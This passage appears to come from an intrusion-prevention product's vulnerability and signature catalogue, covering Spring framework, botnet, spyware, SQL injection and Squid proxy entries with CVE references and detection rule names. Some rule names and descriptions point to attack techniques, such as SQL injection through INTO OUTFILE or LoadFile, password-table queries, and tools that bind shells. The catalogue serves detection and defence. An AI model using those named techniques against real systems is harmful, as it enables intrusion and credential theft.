Generic_CS-Spotify-Network-Connect
Back to top

Spring-Cloud-Config-Server-Directory-Traversal

About this vulnerability: A vulnerability in Spring Cloud Config
Risk: High
First detected in: sgpkg-ips-1194-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Spring Cloud Config
Type: Directory Traversal
Description: A vulnerability in Spring Cloud Config, versions 2.1.x prior to 2.1.2, 2.0.x prior to 2.0.4, 1.4.x prior to 1.4.6, which allows remote attackers to obtain arbitrary config files through directory traversal.
Situation: HTTP_CSU-Spring-Cloud-Config-Server-Directory-Traversal
References:
CVE-2019-3799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3799
Back to top

Spring-Cloud-Function-Spel-Code-Injection-CVE-2022-22963

About this vulnerability: A vulnerability in Spring Cloud Function
Risk: Moderate
First detected in: sgpkg-ips-1450-5242
Last changed: sgpkg-ips-1450-5242
Platform: Generic
Software: Spring Cloud Function
Type: Input Validation
Description: Improper validation of user-provided SpEL expressions causes a code injection vulnerability in Spring Cloud Function. A successful exploit allows a remote attacker to execute arbitrary code on the target system.
Situation: HTTP_CSH-Spring-Cloud-Function-Spel-Code-Injection-CVE-2022-22963
References:
CVE-2022-22963
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963
Back to top

Spring-Core-Remote-Code-Execution

About this vulnerability: A vulnerability in Spring Core
Risk: High
First detected in: sgpkg-ips-1449-5242
Last changed: sgpkg-ips-1495-5242
Platform: Generic
Software: Spring Core
Type: Input Validation
Description: A security bypass vulnerability exists in Spring Core. The vulnerability is due to inadequate validation of parameters used for data binding, allowing for manipulation of the ClassLoader. A remote attacker could exploit this vulnerability by providing a crafted parameter in an HTTP request. Successful exploitation could lead to ClassLoader manipulation, which may lead to execution of arbitrary code under the security context of the container of the target application.
Situation: HTTP_CRL-Spring-Core-Remote-Code-Execution
HTTP_CRL-Spring-Core-Remote-Code-Execution-Suspicious-Parameter-Name
References:
CVE-2022-22965
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965
Back to top

Spring-Security-RegexRequestMatcher-Authorization-Bypass-CVE-2022-22978

About this vulnerability: An attempt to exploit a vulnerability in Spring Security detected
Risk: High
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Platform: Generic
Software: Spring Security
Type: Input Validation
Description: In spring security versions prior to 5.4.11, 5.5.7, 5.6.4 and older unsupported versions, RegexRequestMatcher can easily be misconfigured to be bypassed on some servlet containers. Applications using RegexRequestMatcher with "." in the regular expression are possibly vulnerable to an authorization bypass.
Situation: HTTP_CSU-Spring-Security-RegexRequestMatcher-Authorization-Bypass-CVE-2022-22978
References:
CVE-2022-22978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22978
Back to top

Springsource-Spring-Framework-HttpMessageConverter-Xml-External-Entity

About this vulnerability: A vulnerability in SpringSource Spring Framework
Risk: High
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SpringSource Spring Framework
Type: Malfunction
Description: An XML external entity vulnerability exists in SpringSource Spring Framework. The vulnerability is due to incorrectly configured XML parsing in Jaxb2RootElementHttpMessageConverter, which accepts XML external entities from untrusted sources. This vulnerability is due to an incomplete fix for CVE-2013-4152 and CVE-2013-6429. A remote, unauthenticated attacker can leverage this vulnerability by sending a malicious request to the target server. Successful exploitation would result in the disclosure of information from arbitrary files available in the security context of the server application, server-side request forgery, denial of service and potentially policy bypass.
Situation: HTTP_CS-Xml-Dtd-External-Entity-Multiple-Vulnerabilities
File-TextId_Xml-Dtd-External-Entity-Multiple-Vulnerabilities
References:
CVE-2014-0054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0054
BID-66148
http://www.securityfocus.com/bid/66148
OSVDB-104389
http://www.osvdb.org/104389
Back to top

Springsource-Spring-Framework-Sourcehttpmessageconverter-Xxe-Vulnerability

About this vulnerability: A vulnerability in SpringSource Spring Framework
Risk: High
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SpringSource Spring Framework
Type: Malfunction
Description: An information disclosure vulnerability exists in SpringSource Spring Framework. The vulnerability is due to incorrectly configured XML parsing in the MVC's SourceHttpMessageConverter, which accepts XML external entities from untrusted sources. A remote, unauthenticated attacker can leverage this vulnerability by sending a malicious request to the target server. Successful exploitation would result in the disclosure of information from arbitrary files available in the security context of the server application.
Situation: HTTP_CS-Xml-Dtd-External-Entity-Multiple-Vulnerabilities
File-TextId_Xml-Dtd-External-Entity-Multiple-Vulnerabilities
References:
CVE-2013-6429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6429
OSVDB-102167
http://www.osvdb.org/102167
Back to top

Springsource-Spring-Framework-XML-External-Entity-Information-Disclosure

About this vulnerability: A vulnerability in SpringSource Spring Framework
Risk: Moderate
First detected in: sgpkg-ips-542-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SpringSource Spring Framework
Type: Malfunction
Description: There is an information disclosure vulnerability in SpringSource Spring Framework. The vulnerability is due to incorrectly configured XML parsing which accepts XML external entities from untrusted sources. A remote, unauthenticated attacker can leverage this vulnerability by sending a malicious request to the target server. Successful exploitation would result in the disclosure of information from arbitrary files available to the security context of the server application.
Situation: HTTP_CS-Xml-Dtd-External-Entity-Multiple-Vulnerabilities
File-TextId_Xml-Dtd-External-Entity-Multiple-Vulnerabilities
References:
CVE-2013-4152
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4152
BID-61951
http://www.securityfocus.com/bid/61951
OSVDB-96520
http://www.osvdb.org/96520
Back to top

Spybot-Botnet

About this vulnerability: SpyBot botnet
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: SpyBot is an IRC-controlled bot.
Situation: Generic_SS-Botnet-Spybot-Activity
Back to top

Spyeye-Botnet

About this vulnerability: Spyeye botnet
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: SpyEye is a malicious botnet. While the main focus of SpyEye's monetization is banking fraud and the theft of banking credentials, the bot has the ability to download arbitrary malicious add-on modules at any time. A system infected with SpyEye is likely to be subject to surveillance of the attacker by help of SpyEye's keystroke logging capability as well as its ability to inspect HTTP communications of the common web browsers Internet Explorer and Mozilla Firefox. Furthermore, SpyEye attempts to steal credentials for FTP and POP3 services.
Situation: HTTP_CS-Spyeye-Traffic
HTTP_CSU-Spyeye-Traffic
Back to top

SpyLocked-Application-Usage

About this vulnerability: SpyLocked Application Usage
Risk: Low
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SpyLocked
Type: Misconfiguration
Description: SpyLocked may be considered unwanted software by many organizations. It is an anti-spyware application that may display exaggerated or false spyware scan reports but will not perform threat removal before the software is bought.
Situation: HTTP_CSH-SpyLocked-Application-Usage
Back to top

Spyware-Webhancer

About this vulnerability: Spyware WebHancer
Risk: Low
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WebHancer
Type: Misconfiguration
Description: WebHancer is a spyware that tracks the user's internet traffic and sends information to a remote server. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSU-Spyware-Webhancer
HTTP_CSH-Spyware-Webhancer
Back to top

SQL-Injection

About this vulnerability: SQL injection vulnerability
Risk: High
First detected in: sgpkg-ips-145-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic SQL Server; MySQL; Microsoft SQL Server; PostgreSQL
Type: SQL Injection
Description: Many networked applications use SQL databases to store data. In some cases, programming errors allow user-controlled data to include SQL statements that are executed in the database server. This may allow an attacker to retrieve and alter user credentials, and execute arbitrary commands in the context of the database server.
Situation: HTTP_CSU-SQL-Injection-End-Of-Line-Comments
HTTP_CSH-SQL-Union-Select
HTTP_CSU-SQL-Union-Select
HTTP_CSU-SQL-Select-Password
HTTP_CSU-SQL-Declare-Cast
HTTP_CSU-SQL-Expression-Always-True
HTTP_CRL-SQL-Union-Select
HTTP_CRL-Possible-SQL-Injection-PgSleep
HTTP_CRL-Possible-SQL-Injection-WAITFOR-DELAY
HTTP_CRL-Possible-SQL-Injection-BENCHMARK
HTTP_CRL-Possible-SQL-Injection-INTO-OUTFILE
HTTP_CRL-Possible-SQL-Version-Query
HTTP_CRL-InformationSchema-Query
HTTP_CRL-Possible-SQL-Injection-InformationSchema
HTTP_CRL-Possible-SQL-Injection-LoadFile
HTTP_CRL-Possible-SQL-Injection
HTTP_CRL-Possible-Evasion-In-SQL-Injection
HTTP_CRL-Possible-SQL-Injection-2
HTTP_CSH-Possible-SQL-Injection
Back to top

SQL-Injection-Attack-Tool

About this vulnerability: SQL Injection Attack Tool
Risk: High
First detected in: sgpkg-ips-332-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: SQL Injection
Description: Some SQL attack tools can be identified on basis of the User-Agent they use. This vulnerability is reserved for those.
Situation: HTTP_CSH-SQL-Injection-Attack-Tool-Detected
Back to top

Sqlmap-SQL-Injection-Tool

About this vulnerability: Sqlmap SQL Injection Tool
Risk: High
First detected in: sgpkg-ips-553-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: SQL Injection
Description: Sqlmap SQL Injection tool can be used to find and exploit SQL injection vulnerabilities on a web page.
Situation: HTTP_CSU-SQL-Injection-End-Of-Line-Comments
HTTP_CSH-Sqlmap-SQL-Injection-Tool-Usage
Back to top

Sqlninja-Attack-Tool-Usage

About this vulnerability: Detects the usage of Sqlninja, an SQL injection attack tool
Risk: Moderate
First detected in: sgpkg-ips-122-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft SQL Server
Type: SQL Injection
Description: Sqlninja is a tool that exploits SQL injection vulnerabilities in web applications that use Microsoft SQL server as their back-end. The tool can be used to bruteforce passwords, escalate privileges, bind shells etc.
Situation: HTTP_CRL-Sqlninja-Attack-Tool-Usage
Back to top

Squash-YAML-Code-Execution

About this vulnerability: Squash YAML Remote Code Execution vulnerability
Risk: Moderate
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Squash
Type: Code Injection
Description: There is an arbitrary code execution vulnerability in Squash exception reporting and management system. Exploiting an unsafe function call may be used for running arbitrary ruby code.
Situation: HTTP_CS-Squash-YAML-Code-Execution
References:
CVE-2013-5036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5036
OSVDB-95992
http://www.osvdb.org/95992
Back to top

SQuery-Php-Remote-File-Inclusion

About this vulnerability: A vulnerability in SQuery
Risk: High
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SQuery
Type: Code Injection
Description: There is a vulnerability in SQuery that allows inclusion of arbitary files leading to code injection and execution in the context of the web server.
Situation: HTTP_CSU-SQuery-Php-Remote-File-Inclusion
References:
CVE-2006-1688
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1688
BID-17434
http://www.securityfocus.com/bid/17434
OSVDB-24429
http://www.osvdb.org/24429
OSVDB-24428
http://www.osvdb.org/24428
OSVDB-24427
http://www.osvdb.org/24427
OSVDB-24426
http://www.osvdb.org/24426
OSVDB-24425
http://www.osvdb.org/24425
OSVDB-24424
http://www.osvdb.org/24424
OSVDB-24423
http://www.osvdb.org/24423
OSVDB-24422
http://www.osvdb.org/24422
OSVDB-24420
http://www.osvdb.org/24420
OSVDB-24419
http://www.osvdb.org/24419
OSVDB-24418
http://www.osvdb.org/24418
OSVDB-24417
http://www.osvdb.org/24417
OSVDB-24416
http://www.osvdb.org/24416
OSVDB-24415
http://www.osvdb.org/24415
OSVDB-24414
http://www.osvdb.org/24414
OSVDB-24413
http://www.osvdb.org/24413
OSVDB-24412
http://www.osvdb.org/24412
OSVDB-24411
http://www.osvdb.org/24411
OSVDB-24410
http://www.osvdb.org/24410
OSVDB-24409
http://www.osvdb.org/24409
OSVDB-24421
http://www.osvdb.org/24421
OSVDB-24408
http://www.osvdb.org/24408
OSVDB-24407
http://www.osvdb.org/24407
OSVDB-24406
http://www.osvdb.org/24406
OSVDB-24405
http://www.osvdb.org/24405
OSVDB-24404
http://www.osvdb.org/24404
OSVDB-24403
http://www.osvdb.org/24403
OSVDB-24402
http://www.osvdb.org/24402
OSVDB-24401
http://www.osvdb.org/24401
Back to top

Squid-Acl-Bypass-Using-Null

About this vulnerability: Squid regex ACL bypass by using NULL in url
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Linux; SCO
Software: Squid
Type: Metacharacter
Description: Squid 2.5STABLE4 and earlier allow bypassing of the regex access control lists (ACL). If the url contains a NULL character only the part before the NULL character is inspected against the ACL's. This can lead to unauthorized content being accessed.
Situation: HTTP_CS-Squid-Acl-Bypass-Using-Null
References:
CVE-2004-0189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0189
BID-9778
http://www.securityfocus.com/bid/9778
OSVDB-5916
http://www.osvdb.org/5916
Back to top

Squid-ASN.1-Header-Parsing-Denial-Of-Service

About this vulnerability: A vulnerability in Squid Web Proxy Cache
Risk: Moderate
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Input Validation
Description: There is a vulnerability in Squid web proxy.
Situation: Generic_UDP-Squid-ASN.1-Header-Parsing-Denial-of-Service
SNMP-UDP_Squid-ASN.1-Header-Parsing-Denial-Of-Service
References:
CVE-2004-0918
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0918
BID-11385
http://www.securityfocus.com/bid/11385
Back to top

Squid-DNS-Lookup-Denial-Of-Service

About this vulnerability: A vulnerability in Squid Project Squid Web Proxy Cache
Risk: High
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Misconfiguration
Description: There exists a vulnerability in the way Squid Web Proxy processes Domain Name System (DNS) responses. This vulnerability occurs when Squid performs a Fully-Qualified Domain Name (FQDN) lookup and receives a crafted DNS response. The vulnerability can be exploited by a malicious user to cause a denial of service to the Squid proxy.
Situation: DNS-TCP_Squid-DNS-Lookup-Denial-Of-Service
DNS-UDP_Squid-DNS-Lookup-Denial-Of-Service
References:
CVE-2005-0446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0446
BID-12551
http://www.securityfocus.com/bid/12551
Back to top

Squid-DNS-Replies-Invalid-Free

About this vulnerability: A Squid DNS Replies Invalid Free vulnerability
Risk: High
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Malfunction
Description: A vulnerability in Squid web proxy which allows remote attackers to cause a denial of service condition, due to an error while processing certain DNS replies.
Situation: DNS-UDP_Squid-DNS-Replies-Invalid-Free
References:
CVE-2011-4096
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4096
Back to top

Squid-Gopher-Protocol-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in Squid Project Squid Web Proxy Cache
Risk: Moderate
First detected in: sgpkg-ips-357-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Buffer Overflow
Description: A vulnerability exists in the way Squid web proxy handles responses from Gopher servers. An overly long line in a Gopher response can overflow a fixed size buffer. This could create a denial of service condition for active transactions or could potentially allow an arbitrary code execution with permissions of an account running Squid web proxy. Upon receiving the attack, a Squid proxy will continue without change to its functionality since the buffer overflow does not corrupt any critical data. The browser requesting the Gopher URL might see overly long file names or entries in the HTML page returned from the proxy. As noted in section 4.1, &quot;Technical Mechanism&quot;, the mitigation of this vulnerability will occur in the majority of cases for operating systems supporting the ELF, AOUT or PE executable file format. For operating systems that use a different file format and program image layout, or for the rare case where a non-standard compiler is used, the mitigation factor may not exist. In such a case, an attacker can exploit this flaw to terminate the vulnerable product, creating a denial of service condition. Potentially, an attack may also execute arbitrary code on the target. In this case, the behaviour of the target is dependent on the malicious code.
Situation: Generic_SS-Squid-Gopher-Protocol-Handling-Buffer-Overflow
References:
CVE-2005-0094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0094
BID-12276
http://www.securityfocus.com/bid/12276
Back to top

Squid-HTTP-Host-Header-Port-Handling-Denial-Of-Service

About this vulnerability: A vulnerability in Squid Project Squid
Risk: Moderate
First detected in: sgpkg-ips-533-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Input Validation
Description: There is a denial-of-service vulnerability in Squid proxy. The vulnerability is due to incorrect validation of port values in the HTTP Host header within the hostHeaderVerify function. A remote, unauthenticated attacker could exploit this vulnerability by sending a specially crafted request to the vulnerable server. A successful attack attempt would result in the termination of Squid proxy server creating a denial-of-service condition.
Situation: HTTP_CSH-Squid-HTTP-Host-Header-Port-Handling-Denial-Of-Service
References:
CVE-2013-4123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4123
Back to top

Squid-HTTP-Response-Processing-Denial-Of-Service

About this vulnerability: A vulnerability in Squid Project Squid
Risk: Moderate
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Input Validation
Description: An improper bounds check in the Squid HTTP proxy causes a vulnerability, which when successfully exploited, can allow an attacker to cause a denial of service condition.
Situation: HTTP_CSH-Squid-HTTP-Response-Processing-Denial-Of-Service
References:
CVE-2016-3948
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3948
Back to top

Squid-HTTP-Version-Number-Parsing-Denial-Of-Service

About this vulnerability: A vulnerability in Squid Project Squid
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Input Validation
Description: There exists a denial of service vulnerability in the way Squid handles HTTP version number.
Situation: HTTP8080_CS-Squid-HTTP-Version-Number-Parsing-Denial-Of-Service
References:
BID-33604
http://www.securityfocus.com/bid/33604
Back to top

Squid-Httpmakevarymark-Header-Value-Denial-Of-Service

About this vulnerability: A vulnerability in Squid Project Squid
Risk: Moderate
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Input Validation
Description: There is a denial-of-service vulnerability in Squid Proxy. The vulnerability is due to a miscalculation of a string size when handling HTTP header values. This causes an assertion to fail, and repeated failures can cause the entire service to terminate. A remote attacker can exploit this vulnerability by sending a specially crafted HTTP request. Authentication may not be required depending on the server's configuration. Successful exploitation will cause the Squid Proxy service to terminate.
Situation: HTTP_CSH-Squid-Httpmakevarymark-Header-Value-DoS
References:
OSVDB-90909
http://www.osvdb.org/90909
Back to top

Squid-Long-String-Header-Processing-Assertion-Failure

About this vulnerability: A vulnerability in Squid Project Squid
Risk: High
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Malfunction
Description: There exists a denial-of-service vulnerability in Squid proxy.
Situation: HTTP_SHS-Squid-Long-String-Header-Processing-Assertion-Failure
References:
CVE-2016-2569
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2569
Back to top

Squid-Ntlm-BOF

About this vulnerability: Squid NTLM Buffer Overflow
Risk: High
First detected in: sgpkg-ips-13-1102
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Squid
Type: Buffer Overflow
Description: Squid Web Proxy Cache suffers from a buffer overflow vulnerability in the NT Lan Manager functionality. The vulnerability can be exploited to gain the privileges of the squid process.
Situation: HTTP_CSH-Squid-NTLM-Buffer-Overflow
HTTP_CS-Squid-Ntlm-BOF
References:
CVE-2004-0541
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0541
BID-10500
http://www.securityfocus.com/bid/10500
Back to top

Squid-Oversized-Reply-Header-Handling

About this vulnerability: A vulnerability in Squid
Risk: High
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Squid
Type: Buffer Overflow
Description: A vulnerability exists in the way the Squid web proxy/cache parses a overly large HTTP reply header. An oversized HTTP reply header could trigger unexpected behaviour on the vulnerable Squid server. This flaw cannot be used to exploit the Squid proxy. However, it may be used to attack a client of the proxy.
Situation: HTTP8080_Squid-Oversized-Reply-Header-Handling
Back to top

Squid-Oversized-Reply-Header-Handling-Vulnerability

About this vulnerability: A vulnerability in Squid Project Squid Web Proxy Cache
Risk: Moderate
First detected in: sgpkg-ips-357-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Buffer Overflow
Description: A vulnerability exists in the way the Squid web proxy/cache parses a overly large HTTP reply header. An oversized HTTP reply header could trigger unexpected behaviour on the vulnerable Squid server. This flaw cannot be used to exploit the Squid proxy. However, it may be used to attack a client of the proxy.
Situation: HTTP_SHS-Suspiciously-Long-Reply-Header
Back to top

Squid-Pinger-Denial-Of-Service

About this vulnerability: A vulnerability in Squid web proxy's Pinger service
Risk: Moderate
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Squid
Type: Input Validation
Description: A denial of service vulnerability exists in Squid web proxy's Pinger service. The vulnerability is due to an out of bounds array access when processing ICMP responses. A remote attacker can exploit this vulnerability by sending a specially crafted ICMP response to a vulnerable system. This can result in a denial of service condition.
Situation: IPv6_Unknown-ICMPv6-Message-Type
References:
CVE-2014-7141
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7141
OSVDB-111420
http://www.osvdb.org/111420
Back to top

Squid-Proxy-Cache-Cachemgr.cgi-Resource-Exhaustion

About this vulnerability: A vulnerability in Squid Project Squid
Risk: High
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Resource Starvation
Description: A resource exhaustion vulnerability exists in Squid Proxy Cache Manager. The vulnerability is due to missing input validation in the cachemgr.cgi tool. A remote, unauthenticated attacker can send specially crafted POST requests to cause cachemgr.cgi to use large amounts of memory. Successful exploitation of this vulnerability results in a denial-of-service condition.
Situation: HTTP_CSH-Squid-Proxy-Cache-Cachemgr.cgi-Resource-Exhaustion
References:
CVE-2012-5643
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5643
OSVDB-88492
http://www.osvdb.org/88492
Back to top

Squid-Proxy-Cache-Manager-Expired-Pointer-Dereference

About this vulnerability: A vulnerability in Squid
Risk: Moderate
First detected in: sgpkg-ips-1715-5242
Last changed: sgpkg-ips-1715-5242
Platform: Generic
Software: Squid
Type: Malfunction
Description: An expired pointer dereference vulnerability has been reported in Squid Proxy. The vulnerability is due to a use after free in CacheManager::start. Successful exploitation of this vulnerability can result in a denial of service condition.
Situation: HTTP_CS-Squid-Proxy-Cache-Manager-Expired-Pointer-Dereference
References:
CVE-2024-23638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23638
Back to top

Squid-Proxy-Cache-Update-Denial-Of-Service

About this vulnerability: A vulnerability in Squid Project Squid
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Resource Starvation
Description: There is a denial of service vulnerability in Squid web proxy application. The flaw is due to incorrect bounds checking when processing crafted cache update reply messages. A remote unauthenticated attacker may trigger this vulnerability to terminate the affected service. Upon receiving a crafted HTTP request message, the Squid proxy server will terminate and reset all established connections. However, the Squid monitor process will re-spawn the worker process automatically which restores the proxy services. If the attack is launched continuously, the target Squid proxy may be put into a lasting denial-of-service condition.
Situation: HTTP_CS-Squid-Proxy-Cache-Update-Denial-Of-Service
References:
BID-26687
http://www.securityfocus.com/bid/26687
Back to top

Squid-Proxy-Cache-Update-DoS

About this vulnerability: Squid Proxy Cache Update DoS Vulnerability.
Risk: High
First detected in: sgpkg-ips-680-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Malfunction
Description: A vulnerability exists in Squid 2.6.STABLE16 and earlier that allows remote attackers to create a denial of service condition due to the lack of boundary checking of the proxy server.
Situation: HTTP_SHS-Squid-Proxy-Cache-Update-DoS
References:
CVE-2007-6239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6239
BID-26687
http://www.securityfocus.com/bid/26687
Back to top

Squid-Proxy-Cachemgr.cgi-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in Squid Proxy
Risk: High
First detected in: sgpkg-ips-1177-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Input Validation
Description: A vulnerability in Squid Proxy which allows a remote attacker to execute arbitrary code on a target user's browser by enticing a user to open a crafted link or web page, due to improper sanitization of the user_name and auth parameters within cachemgr.cgi.
Situation: HTTP_CSR-Squid-Proxy-Cachemgr.cgi-Reflected-Cross-Site-Scripting
References:
CVE-2019-13345
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13345
Back to top

Squid-Proxy-Digest-Authentication-Denial-Of-Service

About this vulnerability: A vulnerability in Squid
Risk: Moderate
First detected in: sgpkg-ips-1190-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Malfunction
Description: There exists a denial-of-service vulnerability in Squid Proxy. This vulnerability could be remotely exploited. Successful exploitation could lead in denial-of-service conditions.
Situation: HTTP_CS-Squid-Proxy-Digest-Authentication-Denial-Of-Service
References:
CVE-2019-12525
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12525
Back to top

Squid-Proxy-Digest-Nc-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Squid
Risk: Moderate
First detected in: sgpkg-ips-1671-5242
Last changed: sgpkg-ips-1671-5242
Platform: Generic
Software: Squid
Type: Buffer Overflow
Description: Improper validation of the user-supplied nc field in an authorization header causes a heap buffer overflow in the Squid proxy. A successful exploit can cause a denial of service condition or possibly code execution on the target system.
Situation: HTTP_CSH-Squid-Proxy-Digest-Nc-Heap-Buffer-Overflow
References:
CVE-2023-46847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46847
Back to top

Squid-Proxy-Digest-Nonce-Information-Disclosure

About this vulnerability: A vulnerability in Squid Project Squid
Risk: High
First detected in: sgpkg-ips-1208-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Malfunction
Description: An information disclosure vulnerability has been reported in Squid Proxy. The vulnerability is due to improperly constructing the nonce value used in HTTP Digest authentication. A remote attacker could exploit this vulnerability by sending a request to the target server and subsequently using the obtained nonce value in unintended ways. Successful exploitation could result in the attacker obtaining pointer addresses, which may be used to bypass ASLR and facilitate other attacks.
Situation: HTTP_SHS_Squid-Proxy-Digest-Nonce-Information-Disclosure
References:
CVE-2019-18679
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18679
Back to top

Squid-Proxy-Esi-Component-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Squid Project Squid
Risk: Moderate
First detected in: sgpkg-ips-760-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Buffer Overflow
Description: Improper validation of Edge-side Include (ESI) responses in the Squid proxy causes a vulnerability which can be leveraged by crafting a malicious ESI response. Successful exploitation can allow the attacker to run arbitrary code on the target.
Situation: File-Text_Squid-Proxy-Esi-Component-Stack-Buffer-Overflow
References:
CVE-2016-4054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4054
Back to top

Squid-Proxy-Esi-Response-Processing-Denial-Of-Service

About this vulnerability: A vulnerability in Squid Project Squid
Risk: Moderate
First detected in: sgpkg-ips-787-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Malfunction
Description: Incorrect response processing in the Edge Side Includes (ESI) component of the Squid proxy causes a vulnerability which can be exploited to cause a denial of service condition on the target system. This signature covers also CVE-2018-1172.
Situation: File-Text_Squid-Proxy-Esi-Response-Processing-Denial-Of-Service
References:
CVE-2016-4555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4555
Back to top

Squid-Proxy-Esi-Response-Processing-Denial-Of-Service-2

About this vulnerability: A vulnerability in Squid Project Squid
Risk: Moderate
First detected in: sgpkg-ips-1039-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Malfunction
Description: Incorrect processing of ESI responses causes a denial of service vulnerability in Squid. A successful attack causes a denial of service condition.
Situation: File-Text_Squid-Proxy-Esi-Response-Processing-Denial-Of-Service-2
Back to top

Squid-Proxy-Esi-Response-Processing-Esi_Assign-Denial-Of-Service

About this vulnerability: A vulnerability in Squid
Risk: Moderate
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Platform: Generic
Software: Squid
Type: Input Validation
Description: An input validation error when processing ESI responses with esi:assign tags causes a denial of service vulnerability in the Squid proxy.
Situation: File-Text_Squid-Proxy-Esi-Response-Processing-Esi_Assign-Denial-Of-Service
References:
CVE-2024-45802
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45802
Back to top

Squid-Proxy-Esi-Response-Processing-Esi_Assign-Underflow-Denial-Of-Service

About this vulnerability: A vulnerability in Squid Project Squid
Risk: High
First detected in: sgpkg-ips-1848-5242
Last changed: sgpkg-ips-1848-5242
Platform: Generic
Software: Squid
Type: Input Validation
Description: A denial-of-service vulnerability has been reported in Squid Proxy. The vulnerability is due to an input validation error when processing ESI responses with "esi:assign" tags. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted ESI response data to the target server. Successful exploitation could result in a denial-of-service condition.
